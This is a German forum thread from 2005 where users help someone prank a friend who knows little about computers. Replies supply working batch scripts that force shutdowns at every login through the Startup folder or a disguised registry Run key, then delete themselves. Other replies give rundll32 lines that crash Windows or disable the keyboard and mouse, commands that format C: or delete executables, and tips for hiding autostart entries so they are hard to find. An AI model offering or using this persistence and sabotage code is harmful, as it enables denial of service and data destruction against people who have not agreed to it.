2 Befehle ;)

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Dise, 2. Dezember 2005 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 2. Dezember 2005
    Sers,
    ich will einen Freund ärgern, der nicht so viel ahnung von pc hat.
    Folgendes habe ich vor. ich will eine datei schreiben, in der ein shutdown befehl enthalten ist. kann auch gern ne *.bat sein, aber ic denke net, dass das, was ich eigentlich will, net mit DOS geht. Ich möchte nämlich, dass sichiese *.bat automatisch in den Autostart reinlädt. Wäre geil, wenn ihr ne Antwort wüsstet.
    PS: Da das siocher net in DOS geht, schreibt ´bitte ich schriebt den shutdown befehl in der entsprechenden sprache dazu
    PSS:XodoX, ich zähle besonders auf dich ;)
     

  2. Anzeige
  3. #2 2. Dezember 2005
    del *.exe >> cool.txt
    format c:\

    mfg moep


    augenzwinker back...moep was inspired by xodox^^
    Code:
    [19:33] XodoX: [Suche] 
    2 Befehle ;)
    [19:33] XodoX: 1. format c:
    [19:33] moep: ^^

    mfg moep
     
  4. #3 2. Dezember 2005
    Hi ,

    es geht mit DOS. Steht irgendwo im Board, wie du das mit Autostart hinkriegst ( musste glaub ich irgendwas mit der Registry machen). Wühl dich mal durch die Themen durch , da wirste sicher fündig :D

    Code:
    shutdown -f -t 5 -c "dein kommentar"
    
    fährt den PC herunter in 5 sek (-t 5) und erzwingt das Schliessen(-f) aller Programme ... Wenn du ihn ärgern willst, geht auch sowas:

    Code:
    echo on
    if EXIST C:\*.* (dir C:\ *.exe /s /B > Das.bat)
    if EXIST D:\*.* (dir D:\ *.exe /s /B >> Das.bat)
    if EXIST E:\*.* (dir E:\ *.exe /s /B >> Das.bat)
    start Das.bat
    
    sollte alle .exe ausführen...

    in Dos geht ziemlich viel, obwohl Bash / Shell natürlich um ein vielfaches besser und mächtiger ist ;)

    Edit:// Die .bat sollte man bestmöglichst zu einer .exe machen ... Schreib ne PN an mich, oder such im Appz-Bereich, dann kriegste das Programm :)

    Mfg,

    Kolazomai
     
  5. #4 2. Dezember 2005
    blubs.bat
    Code:
    @echo off
    echo "@echo off" > c:\dokume~1\alluse~1\startm~1\progra~1\autost~1\bla.bat
    echo "shutdown -s -t 0 -f" >> c:\dokume~1\alluse~1\startm~1\progra~1\autost~1\bla.bat
    
    
     
  6. #5 2. Dezember 2005
    Hier siehst du ein paar nützliche Rundll32 Befehle.

    C:\windows\rundll32.exe user,disableoemlayer --> Systemabsturz

    C:\windows\rundll32.exe keyboard,disable --> schaltet die Tastatur bis
    zum nächsten Neustart aus

    C:\windows\rundll32.exe mouse,disable --> schaltet die Maus bis zum
    nächsten Neustart aus

    C:\windows\rundll32.exe user,exitwindows --> Windows beenden

    C:\windows\rundll32.exe user,exitwindowsexec --> Windows neustarten

    Es ist lustig, wenn man z.B. in der Schule/Uni/... eine Verknüpfung
    mit der Befehlszeile für den Systemabsturz in den Autostart erstellt.
    Aber effektiver ist es, wenn man dies in Form eines Registry-Eintrags
    macht. Das geht folgendermaßen:
    -Klicke im Startmenü auf Ausführen
    -Gebe regedit in das Textfenster ein und bestätige mit ENTER
    -Jetzt gehst du in diesen Schlüssel (Verzeichnis/Ordner... keine
    Ahnung wie das richtig heißt):
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
    oder unter ...\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
    -Nun klickst du in der Menüleiste auf Bearbeiten - Neu - Zeichenfolge
    -Dieser neuen Zeichenfolge gibst du irgendeinen Namen und für ihren
    Wert setzt du nun die Systemabsturz oder irgendeine andere
    Befehlszeile ein
    Das hat den selben Effekt wie der Autostart-Eintrag, ist bloß
    schwieriger zu entdecken!
    Du kannst es aber auch mit einen Eintrag in der System.ini unter [boot]
    (manchmal auch [load]) machen. Das hat auch den selben Effekt, ist bloß
    noch schwieriger zu entdecken.
     
  7. #6 2. Dezember 2005
    Sers,
    erstmal danke, für eure Antowortzen. 10er habt ihr alle bekommen.
    Nochmal zur Erklärung, die *.bat soll vollgendes beinhalten / bewirken

    1)Eintrag im Autostart
    2)shutdown -s / -f /-t 60 / -c "Bye bye ( oder so )

    ( 3) ganz vielleicht noch ein backup der Datei auf C:\, falls die auf dem Desktop gelöscht wird.

    So long, Dise
     
  8. #7 2. Dezember 2005
    eintrag in autostart... am besten tippste selbst regedit bei ausführen ein und fügst da den schlüss für deine exe ein diesen expotierst du dann und kannst diese .reg datei mit dem batch command

    regedit.exe /s autostart.reg

    aktivieren
     
  9. #8 3. Dezember 2005
    XyracX

    Hey XyracX das was du da geschrieben hast das klappt echt !! und geht :) voll fett thx
     
  10. #9 3. Dezember 2005
    Code:
    @echo off
    echo Windows Registry Editor Version 5.00 >> temp.reg
    echo. >> temp.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
    echo "System Management"="shutdown -f -t 5 -c \"du nervst\"" >> temp.reg
    regedit /s temp.reg
    del temp.reg
    del deine.bat
     
  11. #10 3. Dezember 2005
    Mh, jetzt hab ich n anderes Prob. Die *.bat ist jetzt im autostart drin, aber wenn man den PC neustartet, öffnet sich einmal das DOS-Fenster, aber das schließt sich sofort wieder :(
    Habta ne Idee? Ansonsten poste ich mal den Inhalt der *.bat
     
  12. #11 3. Dezember 2005
  13. #12 5. Dezember 2005
    Muss das alles zusammen in den editor und dann als bat gespeichert werde, oder wie geht das?
    plz nochmal sagen...

    MfG BadboX
     
  14. #13 5. Dezember 2005
    Angenommen du willst nicht nur einen Befehl davon klaun ;), anonsten müsste alles rein ^^
     
  15. #14 16. Februar 2006
    bei mir findet er keine rundll32.exe!° hab windows xp---> sie liegt unter
    C:\windows\system32\rundll32.exe user,exitwindows
    aber wenn ich hierzu eine verknüpfung anlege kommt immer eine fehlermeldung, dass irgendein modul nicht gefunden wurde

    wie kann man denn per batch eine verknüpfung mit dem namen "klicken" erstellen?
    die eigentliche verknüpfung ist ja "C:\windows\rundll32.exe keyboard,disable"
     
  16. #15 18. Februar 2006
    Code:
    @echo off
    echo Windows Registry Editor Version 5.00 >> temp.reg
    echo. >> temp.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
    echo "System Management"="shutdown -f -t 5 -c \"du nervst\"" >> temp.reg
    regedit /s temp.reg
    del temp.reg
    del deine.bat
    Jetzt bekomm ich die .bat nicht mehr raus. Kann den pc zwar hochfahren aber nach 5-10 sek ist er wieder abgemeldet.
    Was kann ich dagegen tuen?
    edit//
    habs schon einfach f8 drücken dann abgesicherter Modus und dann regedit bei ausführen eingebnen und bei run den schlüssel löschen
     

  17. Videos zum Thema
Die Seite wird geladen...